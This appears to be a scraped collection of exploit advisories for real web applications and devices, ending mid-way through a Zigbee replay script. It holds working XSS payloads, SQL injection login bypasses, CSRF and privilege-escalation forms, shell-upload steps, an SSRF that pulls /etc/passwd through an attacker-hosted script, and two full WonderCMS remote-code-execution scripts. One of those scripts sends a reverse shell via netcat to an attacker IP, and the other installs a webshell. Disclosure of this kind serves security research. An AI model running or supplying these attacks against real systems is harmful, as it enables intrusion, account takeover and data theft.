ISHACK AI BOT

# Exploit Title: Expense Management System - 'description' Stored Cross Site Scripting # Date: 02/12/2020 # Exploit Author: Nikhil Kumar # Vendor Homepage: http://egavilanmedia.com/ # Software Link: http://egavilanmedia.com/expense-management-system/ # Tested On: Ubuntu Vunerable Parameter: "description=" Steps to Reproduce: 1. Open the index.php page using following url http://localhost/Expense-Management-System/index.php click on Add Expense 2. Put a payload on "description=" parameter Payload :- test"><script>alert("XSS")</script> Malicious Request:: POST /Expense-Management-System/expense_action.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 140 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/Expense-Management-System/ Cookie: PHPSESSID=45f122ec98900409467ac74f6113ff4a description=test%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&amount=1234&date=2020%2F11%2F17&expense_id=&action=Add

# Exploit Title: ILIAS Learning Management System 4.3 - SSRF # Date: 10-08-2020 # Exploit Author: Dot/kx1z0 # Vendor Homepage: https://www.ilias.de/ # Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release_4-3 # Version: 4.3-5.1 # Tested on: Linux # Description We can create portfolios, export them to PDF and download them. The issue is that there is an HTML Injection, and if we inject HTML into the portfolio, when it is exported to PDF, it will be rendered. So we can take advantage that it is running under the wrapper file:// to inject an XMLHttpRequest requesting the local file we want, that when downloading the PDF, we can see the content of that file # Exploit We cannot inject the XMLHttpRequest directly into the content of the portfolio, as there is something blocking it. So we will have to host a script in our own server and invoke it from the portfolio We insert this in the portfolio: <script src=host.com/test.js> </script> Script in our server: x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); So, finally, we will only have to download the PDF and there, will be the content of the file we have requested.

# Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service (PoC) # Date: 2020-01-12 # Exploit Author: Ismael Nava # Vendor Homepage: https://www.asctimetables.com/#!/home # Software Link: https://www.asctimetables.com/#!/home/download # Version: 2021.6.2 # Tested on: Windows 10 Home x64 # STEPS # Open the program aSc Timetables 2021 # In File select the option New # Put any letter in the fiel Name of the Schooland click Next # In the next Windows click NEXT # In the Step 3, in Subject click in New # Run the python exploit script, it will create a new .txt files # Copy the content of the file "Metoo.txt" # Paste the content in the field Subject title # Click in OK # End :) buffer = 'Z' * 10000 try: file = open("Metoo.txt","w") file.write(buffer) file.close() print("Archive ready") except: print("Archive no ready")

# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection # Google Dork: N/A # Date: 1.12.2020 # Exploit Author: Aydın Baran Ertemir # Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code # Version: 1.0 # Tested on: Kali Linux Use SQLMAP: sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch

# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF # Date: 01-12-2020 # Exploit Author: Hardik Solanki # Vendor Homepage: http://egavilanmedia.com # Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php # Version: 1.0 # Tested on Windows 10 CSRF ATTACK: Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same-origin policy, which is designed to prevent different websites from interfering with each other. Attack Vector: An attacker can update any user's account. (Note: FULL NAME field is also vulnerable to stored XSS & attacker can steal the authenticated Session os the user) Steps to reproduce: 1. Open user login page using the following URL: -> http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html 2. Now login with the "attacker" user account & navigate to the edit profile tab. Click on the "Update" button and intercept the request in web proxy tool called "Burpusite" 3. Generate the CSRF POC from the burp tool. Copy the URL or Copy the below code. <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action=" http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php" method="POST"> <input type="hidden" name="fullname" value="Attacker" /> <input type="hidden" name="username" value="hunterr" /> <input type="hidden" name="email" value="noooobhunter&#64;gmail&#46;com" /> <input type="hidden" name="gender" value="Male" /> <input type="hidden" name="action" value="update&#95;user" /> <input type="submit" value="Submit request" /> </form> </body> </html> 4. Now, login with the "Victim/Normal user" account. (Let that user is currently authenticated in the browser). 5. Paste the URL in the browser, which is copied in step 3. OR submit the CSRF POC code, which is shown in step 3. 6. We receive a "Status: Success", which indicates that the CSRF attack is successfully done & the Attacker can takeover the user account via Stored XSS (Steal the authenticated Cookies of the user from the "FULL NAME" parameter) IMPACT: An attacker can takeover any user account. (Note: FULL NAME field is also vulnerable to stored XSS & attacker can steal the authenticated Session os the user)

# Exploit Title: Under Construction Page with CPanel 1.0 - SQL injection # Date: 17-11-2020 # Exploit Author: Mayur Parmar(th3cyb3rc0p) # Vendor Homepage: http://egavilanmedia.com # Software Link : http://egavilanmedia.com/under-construction-page-with-cpanel/ # Version: 1.0 # Tested on: PopOS SQL Injection: SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data. Attack Vector: An attacker can gain admin panel access using malicious sql injection queries. Steps to reproduce: 1. Open admin login page using following URl: -> http://localhost/Under%20Construction/admin/login.php 2. Now put below Payload in both the fields( User ID & Password) Payload: admin' or '1'='1 3. Server accepted our payload and we bypassed cpanel without any credentials

# Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection # Google Dork: N/A # Date: 11/16/2020 # Exploit Author: Ritesh Gohil # Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/ # Software Link: https://projectnotes.org/download/studentms-zip/ # Version: 1.0 # Tested on: Win10 x64, Kali Linux x64 # CVE : N/A ######## Description ################################################################# # # # An SQL injection vulnerability discovered in PHP Student Result Management System # # # # Admin Login Portal is vulnerable to SQL Injection # # # # The vulnerability could allow for the improper neutralization of special elements # # in SQL commands and may lead to the product being vulnerable to SQL injection. # # # ###################################################################################### Kindly Follow Below Steps: 1. Visit the main page of the Student Result Management System. 2. You will get an Admin Login Page. 3. Payload which you can use in Email and password field: *AND 1=0 AND '%'=' *4. You will get Admin Access of the Student Result Management System.

# Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution # Date: 2020-11-27 # Exploit Author: zetc0de # Vendor Homepage: https://www.wondercms.com/ # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip # Version: 3.1.3 # Tested on: Ubuntu 16.04 # CVE : CVE-2020-35313 # WonderCMS is vulnerable to SSRF Vulnerability. # In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS. # The theme/plugin installer not sanitize the destination of github/gitlab url, so attacker can pointing te destinaition to localhost. # when the attacker can pointing the request to localhost, this lead to SSRF vulnerability. # the most high impact lead to RCE with gopher scheme and FastCGI running in port 9000 # # python exploit.py # [+] Getting Token # [+] Sending payload # [+] Get reverse shell # nc -lnvp 1234 # Connection from 192.168.43.103:56956 # /bin/sh: 0: can't access tty; job control turned off # $ whoami # www-data # $ import requests from bs4 import BeautifulSoup from termcolor import colored from time import sleep print(colored(''' \ \ /_ \ \ | _ \ __| _ \ __| \ | __| \ \ \ /( |. | | |_| / ( |\/ |\__ \ \_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/ ------[ SSRF to Remote Code Execution ]------ ''',"blue")) loginURL = "http://wonder.com/loginURL" password = "GpIyq0RH" lhost = "192.168.43.66" lport = "1234" payload = "gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500".format(lhost,lport) r = requests.session() data = { "password" : password } page = r.post(loginURL,data) if "Wrong" in page.text: print(colored("[!] Exploit Failed : Wrong Credential","red")) exit() print(colored("[+] Getting Token","cyan")) soup = BeautifulSoup(page.text, "html.parser") allscript = soup.find_all("script") no = 0 for i in allscript: if "rootURL" in str(i): url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ") elif "token" in str(i): token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ") def sendPayload(req,url,payload,token): getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token req.get(getShell) print(colored("[+] Sending payload","cyan")) sleep(1) print(colored("[+] Get reverse shell","cyan")) sendPayload(r,url,payload,token) print(colored("[+] Good bye","cyan"))

# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting # Exploit Author: Soushikta Chowdhury # Vendor Homepage: http://egavilanmedia.com # Software Link: http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel/ # Version: 1.0 # Tested on: Windows 10 # Contact: https://www.linkedin.com/in/soushikta-chowdhury/ Vulnerable Parameters: Full Name Steps for reproduce: 1. Go to registration page 2. fill in the details & put <script>alert("soushikta")</script> payload in Full name. 3. Now goto Admin Panel. After entering go to Manage Users and go to the last page to check the newly added user. We could see that our payload gets executed.

# Exploit Title: PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS # Date: 2/12/2020 # Exploit Author: Amin Rawah # Vendor Homepage: https://www.paessler.com/prtg # Software Link: https://www.paessler.com/prtg # Version: 20.4.63.1412 x64 # Tested on: Windows # CVE : CVE-2020-14073 Description: Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalte his/her privilege to PRTG Administrator. Steps: 1- Login to PRTG system and view source code (currentUserId) 2- Create a map, add an element, double click the element and modify the HTML section 'HTML After' 3- In 'HTML After' add the following code: <form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data"> <input type="hidden" name="name&#95;" value="PRTG&#32;Administrators" /> <input type="hidden" name="defaulthome&#95;" value="&#47;welcome&#46;htm" /> <input type="hidden" name="isadgroup" value="0" /> <input type="hidden" name="adusertype&#95;" value="0" /> <input type="hidden" name="aduserack&#95;" value="0" /> <input type="hidden" name="users&#95;" value="1" /> <input type="hidden" name="users&#95;" value="1" /> <input type="hidden" name="users&#95;&#95;check" value="<currentUserId>&#124;<YOUR_USERNAME>&#124;" /> <input type="hidden" name="users&#95;&#95;check" value="100&#124;PRTG&#32;System&#32;Administrator&#124;" /> <input type="hidden" name="id" value="200" /> <input type="hidden" name="targeturl" value="&#47;systemsetup&#46;htm&#63;tabid&#61;6" /> <input type="submit" value="Submit request" /> </form> <svg/onload='document.forms[0].submit()'/> 4- Save and share the link with PRTG Administrator. 5- Login with the highest privilege.

# Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution # Date: 2020-11-27 # Exploit Author: zetc0de # Vendor Homepage: https://www.wondercms.com/ # Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip # Version: 3.1.3 # Tested on: Ubuntu 16.04 # CVE : CVE-2020-35314 # WonderCMS is vulnerable to Authenticated Remote Code Execution. # In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS. # Using the theme/plugin installer attacker can install crafted plugin that contain a webshell and get RCE. # python3 exploit.py http://wonder.com/loginURL GpIyq0RH # ------------- # [+] Getting Token # [+] Sending Payload # [+] Get the shell # [+] Enjoy! # $id # uid=33(www-data) gid=33(www-data) groups=33(www-data) import requests import sys import re from bs4 import BeautifulSoup from termcolor import colored print(colored(''' \ \ /_ \ \ | _ \ __| _ \ __| \ | __| \ \ \ /( |. | | |_| / ( |\/ |\__ \ \_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/ ------[ Auth Remote Code Execution ]------ ''',"blue")) if len(sys.argv) != 3: print(colored("[-] Usage : ./wonder.py loginURL password","red")) exit() loginURL = sys.argv[1] password = sys.argv[2] r = requests.session() data = { "password" : password } page = r.post(loginURL,data) if "Wrong" in page.text: print(colored("[!] Exploit Failed : Wrong Credential","red")) exit() print(colored("[+] Getting Token","blue")) soup = BeautifulSoup(page.text, "html.parser") allscript = soup.find_all("script") no = 0 for i in allscript: if "rootURL" in str(i): url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ") elif "token" in str(i): token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ") payload = "https://github.com/zetc0de/wonderplugin/archive/master.zip" def sendPayload(req,url,payload,token): getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token req.get(getShell) shell = url + "plugins/wonderplugin/evil.php" checkshell = req.get(shell) if "1337" in checkshell.text: return True else: return False print(colored("[+] Sending Payload","blue")) shell = sendPayload(r,url,payload,token) if shell == True: print(colored("[+] Get the shell","blue")) print(colored("[+] Enjoy!","blue")) shell = url + "plugins/wonderplugin/evil.php" while True: cmd = input("$") data = { "cmd" : cmd } res = r.post(shell,data) if res.status_code == 200: print(res.text) elif shell == False: print(colored("[+] Get the shell","blue")) print(colored("[+] Enjoy!","blue")) shell = url + "plugins/wonderplugin-master/evil.php" while True: cmd = input("$") data = { "cmd" : cmd } res = r.post(shell,data) if res.status_code == 200: print(res.text) else: print(colored("[!] Failed to exploit","red"))

# Exploit Title: IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path # Discovery by: Manuel Alvarez # Software link: https://www.pconlife.com/download/otherfile/20566/e82994866a370a480607637f28b82835/ # Discovery Date: 2020-11-27 # Tested Version: 1.0.6433.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" | findstr /i /v """ Audio service STacSV c:\Program Files\IDT\WDM\STacSV64.exe Auto # Service info: C:\>sc qc StacSV [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: StacSV TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\STacSV64.exe GRUPO_ORDEN_CARGA : AudioGroup ETIQUETA : 0 NOMBRE_MOSTRAR : Audio Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting # Date: 27-11-2020 # Exploit Author: Sagar Banwa # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/free-projects/php-projects/online-voting-system-project-in-php-2/ # Tested on: Windows 10/Kali Linux Steps-To-Reproduce: 1. Go to register 2. Add the payload in Username : <script>alert(1)</script> 3. And complete the register 4. Login to the account POST /vote/reg_action.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 593 Origin: http://localhost Connection: close Referer: http://localhost/vote/register.php Cookie: PHPSESSID=1sqkq0u1m2j47906htd45opcep Upgrade-Insecure-Requests: 1 firstname=user1&lastname=user2&username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=testtest&g-recaptcha-response=03AGdBq24TB5LilE4y9YCZx4I_XrKLBs2ftYrVEJ70_vhpDG-FXCKhzfB-EmAD-NnhKRSZ8_A88_ZNB4nXnwMBs8cU1Qgrqzs8Yme0Bmral8WRK1umGikJeDzliuigIKgZ6Q2Me9zGS-ecZyrujgF4tKSlMs3K_KNgVhEhlAsslrfBe7jQg40aG3PdMCXTTOst4Lt91vswl1G_dmYjrLEh7AfLJS7XYgXrEt4Pfau_mJ3KzE_hf-MxbpTI9_NkCLanUiW8-VI1t3uopUbSE9xH53X1cUExoe_dGpwnkygZw_4yEDp-iBYA73wql5ow1W43OIn5pmSBz_Sdv1VbfAqbFMEIXXJx4o5D_TLiVKLDQCj2Vy-fRmohlpYwV76NR5Iu2D693FKCs3KODRNSaitpOevSfcYh3h05vCGuPSO1fCu4c3v1daiIdFKPwDvfKS_Lm8jgoFK4kfnZ&submit=Next

# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path # Discovery by: manuel Alvarez # Discovery Date: 2020-11-07 # Vendor Homepage: https://www.realtek.com/en/ # Tested Version: 1.0.64.7 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """ Andrea RT Filters Service AERTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto # Service info: C:\Users\ComoDVD>sc qc AESTFilters [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: AESTFilters TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Andrea ST Filters Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting # Date: 24-11-2020 # Exploit Author: Parshwa Bhavsar # Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip # Version: 1.0 # Tested on: Windows 10/XAMPP Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack Vector : This vulnerability can result in the attacker to inject the XSS payload in the Title field of the page and each time any user will open the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Title Parameter in Edit Post Page. Payload : "><img src=x Onmouseover=alert(document.domain)> Vulnerable URL : http://localhost/online-news-portal/news_portal/admin/index.php?page=new_post Steps To Reproduce : 1) Go to the admin Dashboard 2) Click on Posts and click Add New button. 3) Put Payload into the Title parameter. 4) Click on Save. 5) XSS payload will be triggered.

# Exploit Title: NewsLister - Authenticated Persistent Cross-Site Scripting # Date: 2020-11-27 # Exploit Author: Emre Aslan # Vendor Homepage: https://www.netartmedia.net/newslister.html # Tested on: Windows & XAMPP ==> PoC <== 1- Login to admin panel. 2- Enter the payload to title value. 3- View the news. XSS will be execute. ==> HTTP Request <== GET /admin/index.php?page=add HTTP/1.1 Host: 127.0.0.1:8080 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: host/admin/index.php?page=home Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: AuthUser=administrator~da1907216877e31462c14b35db67de32~1606484275; PHPSESSID=nn5gq66nla4lfs47fq9eoctvuf

# Exploit Title: Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting # Date: 26-11-2020 # Exploit Author: Parshwa Bhavsar # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14609/bakeshop-online-ordering-system-phpmysqli-full-source-code.html # Version: 1.0 # Tested on: Windows 10/XAMPP Payload : "><img src=x onerror=alert(1)> Steps to Reproduce :- 1. Login in admin dashboard & Click on 'Categories'. 2. You will notice the "New" button ,Click on that and You will notice the "Category" input field. 3. Put XSS Payload on that field and save it. 4. XSS will be triggered.

# Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass # Date: 21/11/2020 # Exploit Author: Aditya Wakhlu # Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 # CVE: CVE-2021-3278 Step 1: Open the URL http://localhost:8080/lssems/admin/login.php Step 2: use payload Aditya' or 1=1# in user and password field Malicious Request::: POST /lssems/admin/ajax.php?action=login HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost:8080 Connection: close Referer: http://localhost:8080/lssems/admin/login.php Cookie: PHPSESSID=mpqu31slfcd7fjc89gm9veb1o3 username=Aditya'+or+1%3D1%23&password=Aditya'+or+1%3D1%23

# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection # Date: 2020–11–17 # Exploit Author: Anurag Kumar Rawat(A1C3VENOM) # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/ # Version: 1.1 # Tested on Parrot os(Linux) Attack Vector: An attacker can gain admin panel access using malicious sql injection quiries. Steps to reproduce: 1. Open admin login page using following URl: -> http://localhost/erms/admin/index.php 2. Now put below Payload in both the fields( User ID & Password) Payload: ' or '1'='1 3)Server accept this payload and attacker successfully bypassed admin panel without any credentials

# Exploit Title: WonderCMS 3.1.3 - 'menu' Persistent Cross-Site Scripting # Date: 20-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.wondercms.com/ # Version: 3.1.3 # Tested on: Windows 10/Kali Linux # Contact: https://www.linkedin.com/in/hemantsolo/ # CVE: CVE-2020-29469 Attack vector: This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Menu. Steps-To-Reproduce: 1. Go to the Simple website builder. 2. Put this payload in Menu: "hemantsolo"><img src=x onerror=confirm(1)>" 3. Now go to the website and the XSS will be triggered. GET /demo/hemantsolo-img-src-x-onerror-confirm-1 HTTP/1.1 Host: 127.0.0.1 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 DNT: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: 127.0.0.1/demo/hemantsolo-img-src-x-onerror-confirm-1 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: PHPSESSID=31ce0448562cc182b5173a300a923b93

# Exploit Title: DotCMS 20.11 - Stored Cross-Site Scripting # Exploit Author: Hardik Solanki # Vendor Homepage: https://dotcms.com/ # Version: 20.11 # Tested on Windows 10 Vulnerable Parameters: Template Title Steps to reproduce: 1. Login With Admin Username and password. 2. Navigate to Site --> Template --> Add Template Designer 2. Entre the payload <script>alert(document.cookie)</script> in Template Title. 3. Now Navigate to Site --> Template. We could see that our payload gets executed. And hence it executed every time.

# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) # Date: November 17th, 2020 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: Source Code & Projects (https://code-projects.org) # Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf # Version: 1.0 # Tested On: Windows 10 (XAMPP Server) # CVE: CVE-2020-28688 --------------------- Proof of Concept: --------------------- 1. Authenticate as a user (or signup as an artist) 2. Click the drop down for your username and go to My ART+BAY 3. Click on My Artworks > My Available Artworks > Add an Artwork 4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload 5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution

# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile # Date: November 17th, 2020 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: Source Code & Projects (https://code-projects.org) # Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf # Version: 1.0 # Tested On: Windows 10 (XAMPP Server) # CVE: CVE-2020-28687 -------------------- Proof of Concept: -------------------- 1. Authenticate as a user (or signup as an artist) 2. Go to edit profile 3. Upload a php-shell as profile picture and click update/save 4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution

# Exploit Title: Ksix Zigbee Devices - Playback Protection Bypass (PoC) # Date: 2020-11-15 # Exploit Author: Alejandro Vazquez Vazquez # Vendor Homepage: https://www.ksixmobile.com/ # Firmware Version: (Gateway Zigbee Module - v1.0.3, Gateway Main Module - v1.1.2, Door Sensor - v1.0.7, PIR Motion Sensor - v1.0.12) # Tested on: Kali Linux 2020.3 # The coordinator of the Zigbee network (Zigbee gateway) does not correctly check the sequence number of the packets that are sent to it, which allows forging messages from an end device to the coordinator (example: turn on a light bulb, open a door, ...) by injecting a very large value in the "sequence number" field. # To exploit this vulnerability # 1. Capture Zigbee traffic with a sniffer (Api-Mote) and save it in .pcap format # 2. Open the file with Wireshark and locate the packet you want to forward (turn on a light bulb, open a door, ...) # 3. Copy that packet as "hex dump" and save it to a .txt file # 4. Modify the "sequence number" field to a high value such as 250 # 5. Convert the txt file to .pcap again # 6. Forward the packet to the network, using a tool such as Killerbee #!/bin/bash function usage(){ echo -e "\nUsage: $0 [ZigbeeChannel] [SecuenceNumber] [HexDumpFile] [ShortSource] [ExtendedSource] [ShortDestination] [ShortPanId] [FCS]" echo -e "Example: $0 11 250 Open_Door_Alert_Hex_Dump 0x0001 11:ff:11:ff:11:ff:11:ff 0x0000 0x3333 0x0000 \n" echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n" } function message(){ echo -e "\nProof of Concept" echo -e "There is an incorrect check of the \"sequence number\" field on Ksix Zigbee devices\n" echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n" } function poc_playback(){ # Variables ZIGBEE_CHANNEL=$1 SECUENCE_NUMBER=$2 HEX_DUMP_FILE=$3 SHORT_SOURCE=$4 EXTENDED_SOURCE=$5 SHORT_DESTINATION=$6 SHORT_PAN_DESTINATION=$7 FRAME_CHECK_SECUENCE=$8 declare -a first_line_array declare -a second_line_array declare -a last_line_array # Change packet fields while IFS= read -r line do if [[ "$line" == "0000"* ]]; then IFS=' ' read -ra first_line_array <<< "$line" first_line_array[0]+=" " first_line_array[3]=$( printf "%x" $SECUENCE_NUMBER ) first_line_array[4]=${SHORT_PAN_DESTINATION:4:2} first_line_array[5]=${SHORT_PAN_DESTINATION:2:2} first_line_array[6]=${SHORT_DESTINATION:4:2}; first_line_array[11]=${SHORT_DESTINATION:4:2} first_line_array[7]=${SHORT_DESTINATION:2:2}; first_line_array[12]=${SHORT_DESTINATION:2:2} first_line_array[8]=${SHORT_SOURCE:4:2}; first_line_array[13]=${SHORT_SOURCE:4:2} 